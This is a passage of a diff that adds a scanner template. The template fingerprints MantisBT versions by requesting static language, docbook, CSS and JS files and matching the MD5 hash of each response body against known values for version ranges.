1.2.20 
+ dsl: + - "(\"ff0bd25d8bc52ef7afaadd2979f94c74\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"d3b00b26c481e4ec345b7b0173d255df\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"7e6fe6bb1a034afc5d66f7e6b08e019b\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"edfcb9640f57880dec1ad2f6ab9791db\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_belarusian_tarask.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"d51498d5f6aea7c211dd810d23390a76\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"09e89b3b0034df053d365700d6fa32d3\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"0305866b412342994bb543331d9a3184\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"714f4783bc125a2e01ed736c645b733e\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"a033d6084555d0012723f348c2b370ab\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5504fc58bbaa32760557ee67b1667e11\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"01f4e8217bea9ac6f14c3094e49123ae\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"466a154588514d385c235e4e0481bb8d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_serbian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"7742706f6ba44e4f1d451077bcf0716b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"b952e8792615136a330c825d97c3b2cb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0a4425bd8bfbd9b324c953cec29c7f58\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"b7fb2695345a0a4081b388ce762c9d9c\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d3df506ac3aad30ef8244fcb8335a324\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"e381620f64b4c4d280968acc9c161789\" == md5(body))" + + - 
method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/database.xml" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"1f9b5eca120117bdae8fa0cc02c971b7\" == md5(body))" + - type: dsl + name: 2.0.1 + dsl: + - "(\"72cdc8213dc39aac5ba5756e6136717a\" == md5(body))" + - type: dsl + name: 2.0.0 + dsl: + - "(\"f5e86ccfb9c3fd85db971d322dff9e25\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"d516d6295b5e135352da0ec324aa4777\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_czech.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.8.1 + dsl: + - "(\"ad115c68d8b50743cec13cb5122eb852\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"85e5700fde98991839a3928a221e5006\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"0b9b1c24d7befbc8f77b10fadbf76e83\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"c8ffef544a9996bf46a9025a823e7411\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d855e4f4c7c475028a9c1ea68e7f9def\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"846e4d70fbe177169ba87316106b345f\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"301d5627756efe61b6b213f218462246\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"aa70eedcfc2e6e734beba686cfaba300\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"3a6c7b7335afa1dab174789d9b44a81d\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"79d5a88d690c40c0d0f15947f3d62077\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"8f8f3bf189a81b62bd0e38838a36fcca\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"d57204bfd55e15d3f5794a825398c9e1\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"43ee915ec3357cedcdf00bdd549e87e0\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.21.3 + dsl: + - "(\"e8b8c31149c2364c141e3377c974e52a\" == md5(body))" + - 
type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"454887a6938d235311715357408d5297\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"2a7da0350f3f6a91fd60029cca0d5fb6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_serbian.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.10.1 + dsl: + - "(\"9721803b017a81b06afc617670a00aa2\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"783763623bfd7262bc7fc2a97bbceaa2\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d4a7a8f3e3b737f715bd6be1a473dc94\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b00751269231a61a6d032951fd1068db\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"182b2c1a256dc969b4dd77ba3d55e458\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"aa7f59d66d5a5552127ba07ae51e0a42\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"f3e3cdcdcf2cd1f1230a4ef7bacd8956\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.17.2 + dsl: + - "(\"bab0849230f6f4ceef39edf8caec4af8\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"06837d5e5d07ef9e40ed2ed315e88f45\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"702d7620927f6acf2033e5c90fe1cab8\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"4bafab382681ae83e7e56dfd4fd879f1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_german.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"2015820fd8cf4717adadf77eb9c4837d\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.5.2 + dsl: + - "(\"82d9d905affa0c37e36cf671fd762cf1\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"e56d9025355a263fa003e1d6c45641c3\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"06233ff73681664cb9a725d2c11c3a1e\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - 
"(\"1c62b7eafa3b916070835c55563b9992\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"4c03cc35e1e65cc8a47c4848e5688677\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"174bb8cebabba856bbcc90d508aafaa4\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"eb16c7d77823f18d31f09e441cf4621f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9c3e8b41036993bbabf95ba62d787bce\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"d610e2cd453eed1a463361cc8d7577a5\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"87287656d7682eb769a73336796267e6\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"51b9ed95cebfd5ee94dc68f3d8641128\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"8bdb294d4c1a309c52155671ce4b58b1\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"b21819dd6d7af7694a5a333171eec7b9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_catalan.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.19.1 + dsl: + - "(\"af68a7f328a3df272762dbbe0e0dd0ce\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"3810ff0466c86cd82a3a30d79b36b371\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"dc96d7fce961f828600831d4d3fa2e47\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"f1a760768ad5fd5aec8cd9a7bab97a2a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"920a7185f4789dd43b7082b680a6cf89\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"65ba6d82b600812a55a3b5a03c608d91\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"668ee267285e3ed64c0ef47f57ffc6b6\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"a4e70d1d349662f53e926b9d343ce166\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"fa58e0fca37c7248a144454b46f6ca35\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + 
dsl: + - "(\"2ef3b5eb45e96a88d13e5664542c7f7c\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"8564bb582d0104b42642554dd02ac714\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"35c985ec6aec8d6dd6ff16796709dc5b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"bf234f210b05f43537574678b6567fb2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_serbian_latin.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"2429960d9683b90585dd959f54c9bd42\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"eaa867d6ecde8c5faa7b632ab308b678\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ca2fb2966192f85e6f9fb810eb2749e3\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"740399978f77f8a79fcae20ad35639fb\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"36a1e923e7a3521ab282d09f6e75afdb\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"6582eda29bd4ebbc59b7e3f5e2d3764c\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"d4101470b8207a12884e7d0158ee0cb3\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"27403acd269e245f3e487ec33db2b76e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_greek.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.13.2 + dsl: + - "(\"537ab0c27becbefc7a797f6948d2fc29\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.5.2 + dsl: + - "(\"d41cbbbbc866dd8ec00b81e66a5b542c\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"c8abc8aeb5db490a8e70442b2eb819fe\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"611883d204a1f6de364a1720de9b2e7f\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"0b3cbaeeee03fff45c746f3d0a006f18\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"e38eec19e33662bf6ff5a41c89c4b39d\" == md5(body))" + - type: dsl + name: 
2.15.0 - 2.22.2 + dsl: + - "(\"94efe29cb05c8c69e885466b605f8f80\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"10c33a3cbf5ce82888dcfe721acdbfe9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/adm_config_report.js" + + matchers: + - type: dsl + name: 2.22.0 + dsl: + - "(\"b997f6c9e597a3b63e9be7707ac34095\" == md5(body))" + - type: dsl + name: 2.22.1 - 2.23.1 + dsl: + - "(\"e460043e9e29554411af98020ef8de46\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"2cbc328f01d4674ec00c4a9ba90c7c04\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Page_Descriptions.xml" + + matchers: + - type: dsl + name: 1.3.7 - 2.18.1 + dsl: + - "(\"42f99793d49fc815af8bda3cab2f632c\" == md5(body))" + - type: dsl + name: 1.3.1 - 2.2.0 + dsl: + - "(\"bfacafe760b8814d663ce004e0db4e02\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"bf79722a9c97e7360dbe150d412cd338\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"eaab069dee1f6ceb20079c208eee4595\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"437af183ae8e69e7db78ab69ee751b4f\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"fd1621465385af0a530f9353b6547f6f\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"26aff45c5243d6d1f848ecb3e2c1d00f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_luxembourgish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"fa03c6da02e4e4e47adce8d3d5120edb\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"441e111e772e945a2677713b55e87540\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"4a9fff48c5c6a3a6729cb4fe242dc6c8\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"5f2ed4080528e44333f294e85441813c\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"4aab1f67c176b6f5d6967661e7aa1b69\" == md5(body))" + - type: dsl + name: 
2.17.0 - 2.19.1 + dsl: + - "(\"87f583d35a9f228776018e7b95c0c294\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"0a9c31746de37f0d43bd24a192a24bb7\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"55ab3af7af403a808fb7e9f3f9a3eb83\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"a4c86b0cfc1a9c656b72474ffac3ee4b\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"b11c5287fa0054c176f0a1244ec9a407\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_qqq.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.12.2 + dsl: + - "(\"c86d08c595da9575f42d432e035d07d2\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"61e0e943a674ee9c2ccce08d30381b32\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"705c3a7fcdb904a2c4ab514e6f7030e6\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"05329dbc886ca40ec4238491a14bdfca\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"148baf55650bca90c16647f4dfacd587\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"e06623e3a541b1f206c7aa2b336230db\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"1e10b1046be20e4d827796ba227313c0\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"cbeab2f08c9aa5ab494785acb62556d5\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"7d2f57d4e06495a45575b09405434800\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"31117aba073a44b4cf137c066819323e\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"ba8a8e4730aaa2378c25b66486986a92\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"53a98c05bef5dea23954f808b56ae196\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"eb83f0977a278d756057b6153c5dbd70\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"7422096e633521c4daaa2c2b2c1d84f4\" == md5(body))" + - type: dsl 
+ name: 2.13.0 - 2.19.1 + dsl: + - "(\"82b341d3ca6fc28d10f403f84e3d69f7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"f024ec874af3f387804df6c8258dfd88\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"5e3825ddc5b7dc94397217447597437b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"aa130d69161eb3c91c424ad1bf97bc84\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"4c61bbeab3c3abd23738f26e82a06ae7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_turkish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"dab70fc2516f8065f8936cf494d505a6\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"57ab31e61bd922248b9f1ed4b4ef010f\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9eb5f92ca0448d0201c45e8ecd23b0b5\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5a6fc6038e930ef1506d9063cd8ebd43\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"32b806f7916fbdcb4db057a227bf3794\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"936c8471d6fd22df7f6a9ead9d15a9c3\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"d967dae6f8bbb159698ab2f8177fbe81\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"859622256e4aa85fec846a0217dc140b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace-mantis.css" + + matchers: + - type: dsl + name: 2.3.0 - 2.6.0 + dsl: + - "(\"297efdef3fb35297a6b47b9f0b09a58f\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"a32f3f8a9ba9c43564d7d8a551ef0dd9\" == md5(body))" + - type: dsl + name: 2.1.1 - 2.1.3 + dsl: + - "(\"a54b265780669d714f305bfa95ef7440\" == md5(body))" + - type: dsl + name: 2.1.0 + dsl: + - "(\"0b25f9d019cd982445478bfcb89fff58\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"1d822ccdb6d2142ae52c092f754bcc4f\" == md5(body))" + - 
type: dsl + name: 2.7.0 - 2.19.1 + dsl: + - "(\"39eac6154892cac7af2c6b51308b676c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"beab5586b309516ea351aa701aa0a37a\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.22.2 + dsl: + - "(\"93ab3da574cec232d55f3163b1e0f6f2\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"bfeb262567580d426e164ba7477db8ce\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"a2b359cbe974bafc3ab19f8d54fa674c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_skr-arab.txt" + + matchers: + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"67c65d21f522945fb3138e7d64920839\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"8c9e47303a317246150b5924171327d6\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"de55658b87b0f39185418abc125c5c6f\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"04e58769713d563457fa7a6b43f3d850\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"9b84b36906dc176452ace2092523686b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"38720b82dbdbc4af475a3da8e5522105\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"cd863c13bd4d9e16a3cdf5a53d2d17f8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/display.xml" + + matchers: + - type: dsl + name: 2.3.0 - 2.10.1 + dsl: + - "(\"c67c5b21e6313818da769e9004fe1c23\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.2.4 + dsl: + - "(\"628487fe81c473bb5adedb4e1ff8a0ff\" == md5(body))" + - type: dsl + name: 1.3.1 - 1.3.20 + dsl: + - "(\"1f640424eb47779ef436974aa3fc7762\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"c1150d4ddd625aea6883e185119cceca\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.21.3 + dsl: + - "(\"87085590b80d6b0934cd839a8f3188d3\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"13f455ba57f6d0f3f04feb70a50c3381\" 
== md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_volapuk.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"b397fcf5fb0182f91a3729dbeeeededb\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"e546b23f0080b5484e0e3a96ae700885\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"3a0aae8d433db7fdd7aa6d65f6c545d3\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"3767df00932c597fe082926e2d1692c8\" == md5(body))" + - type: dsl + name: 1.2.1 - 1.2.4 + dsl: + - "(\"9afb52e595fbb1947aa2f6817e095f67\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0dcdcb6cd2ce4faad4fa2a8de6842ab6\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"437e208c24d1ea9f811f18cdc5234c13\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"05e6215ec7a005b53df7eae95d0d115a\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"2a47a66fc5715a9d75dc269c9b39f0ff\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"1f8aed0144d049dd4c84941d04112646\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"5c4dae394c5f5a1b47d44b23c1ad3671\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"dc631bf3009a9bd87f2b1929d573659a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_asturian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"0d9d3a535af49576abb24bf88fbe5630\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.5.2 + dsl: + - "(\"daea1e5c2835ebabeac7670aab6a56b6\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.4 + dsl: + - "(\"98459e53f0e6ca14833db2fbc37ab07a\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"84df3d8245b1d4bbc3cb982dcdbb9df9\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"10fa6cae32a46832de73f15aec817b49\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"76f63cb0191049e4094c1be9f13379a9\" == md5(body))" 
+ - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"8d9f95a86274735f0b08399c2ac7ed76\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.8.1 + dsl: + - "(\"0c9b33be6b234f6497ed8828c0231db0\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.12.2 + dsl: + - "(\"716852ac18142e41c0b946283a7965aa\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"09211ddc162ea140a406dc1cf74c99be\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"7f2f3821edb4243d6452f1132455db41\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_greek.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"8ce8a561d25758fb94177b945697af0c\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"2d9369b9f3dfd33a1f41970b5f2527ef\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5f498e1543ca6b598cf331fc342962f6\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"ca620948684657a2a53eb3819f2872f8\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.13.2 + dsl: + - "(\"8a6d0c8f5b06998d128962ce90e43ed6\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"efcb1307151c9a9fe6355b7f76bbd9f7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/publican.cfg" + + matchers: + - type: dsl + name: 1.3.1 - 2.10.1 + dsl: + - "(\"610694dcb1d56a3406fcdc51ea179400\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"cf44df7e41083a620c9c0f128bf52a39\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.24.3 + dsl: + - "(\"8b63ca0b4b8e2400846994d54aa21ea8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/publican.cfg" + + matchers: + - type: dsl + name: 1.3.1 - 2.10.1 + dsl: + - "(\"079f9593e147f5813d1404dfd347fb13\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"61f1ab6cc219a3cf30d2d9abe9ae62fc\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.24.3 + dsl: + - "(\"f19b5d6db810638710413589395d9661\" == 
md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_french_canadian.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"39e9dc967fb670bd0855b3cc1d3b1147\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"df3f6574b4e4814c0b8c1390c68bb92e\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"743c91e2c91ee02396daf08de2d67d94\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_traditional_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"4ef8c52ef0089252f25ee86b120d54c3\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f298d92cd7d5d8918e78c24945387afb\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"d5e69ea2439d56d6f88c1baa3266b113\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_japanese_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"2e6a0b48af81a8153841fcdb1a5d4698\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"b4bf3bc5be59c79e21d410dcab2483e6\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"0ea6a3ee98fea276a9130367087d07d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_simplified_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"46b6c9841febac3c1d7c2b66c1e70a56\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"cfdbb09a36f53c164a14ee3ad4b0daf1\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"db96efc51e077d536499d5ed37eed64e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_russian_koi8.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"cb6c77b8617c19c6572ffc77f577089b\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"cc5e7727bc4381bcc46138699b9c9646\" == md5(body))" + - type: dsl + name: 1.0.6 - 